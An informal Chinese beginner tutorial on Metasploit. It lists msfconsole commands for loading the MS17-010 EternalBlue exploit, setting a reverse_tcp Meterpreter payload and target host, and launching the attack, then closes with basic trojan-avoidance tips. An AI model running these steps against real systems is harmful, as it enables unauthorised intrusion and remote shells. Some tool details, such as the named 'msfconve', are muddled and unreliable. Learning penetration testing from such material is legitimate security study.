簡介：

Metasploit Framework(MSF)是一款開源安全漏洞檢測工具，附帶數(shù)千個已知的軟件漏洞，并保持持續(xù)更新。Metasploit可以用來信息收集、漏洞探測、漏洞利用等滲透測試的全流程，被安全社區(qū)冠以“可以黑掉整個宇宙”之名。剛開始的Metasploit是采用Perl語言編寫的，但是再后來的新版中，改成了用Ruby語言編寫的了。在kali中，自帶了Metasploit工具。

作者最先接觸的就是它，極為好用?。?！

強烈推薦?。?！

而且其中自帶nmap，hydra等工具。

基礎使用：

msfconsole #進入框架

search ms17_010 # 使用search命令查找相關漏洞

use exploit/windows/smb/ms17_010_eternalblue # 使用use進入模塊

info #使用info查看模塊信息

set payload windows/x64/meterpreter/reverse_tcp #設置攻擊載荷

show options #查看模塊需要配置的參數(shù)

set RHOST ip #設置參數(shù)

exploit / run #攻擊

注：上面的ms-17-010-是永恒之藍漏洞-比較著名的漏洞

上面的是一個演示。

當你想要找一個漏洞時，輸入search +

我以前就這樣試過，結果啥也沒試出來......

但是還是很有用的。

你也可以直接輸入search

找到你想用的漏洞時，就輸入use+編號 或者是use +名稱（可以使用tab補全，輸入前幾個字母（是我在游戲里學的）就像exploit，你可以輸入exp，按tab，前提是里面沒有除了exploit以外exp開頭的單詞）

據(jù)我了解到的，metasploit不止它一個，還有msfconve和meterpreter

只要輸入相應的單詞就可以利用相應的模塊（因為msf本身就是集成模塊）

注：msf是metasploit的命令提示符，我們將metasploit稱為msf

在使用好漏洞時，輸入show options，從而查出相應的配置

比如：rhost是目標主機

lhost是發(fā)動攻擊的主機

lport是所用端口

在配置好后，就可以輸入run或exploit開始攻擊

如果出現(xiàn)了msf

就說明完成了，之后再分析爆出來的代碼，判斷是否成功。

其實我還是想教給大家關于木馬的制作。但由于不會過審，所以就先教給大家木馬的防范方法吧。

一般在你瀏覽一些違規(guī)網(wǎng)站時，3XX就會提醒你有木馬。這個時候就盡量不要點進去，因為你一旦點進去，對方就可以在瞬間取得你的權限（這就有點超綱了，這屬于是后滲透階段了）

注意尤其是.exe的文件，是木馬的可能性極高，來路不明的文件也有可能。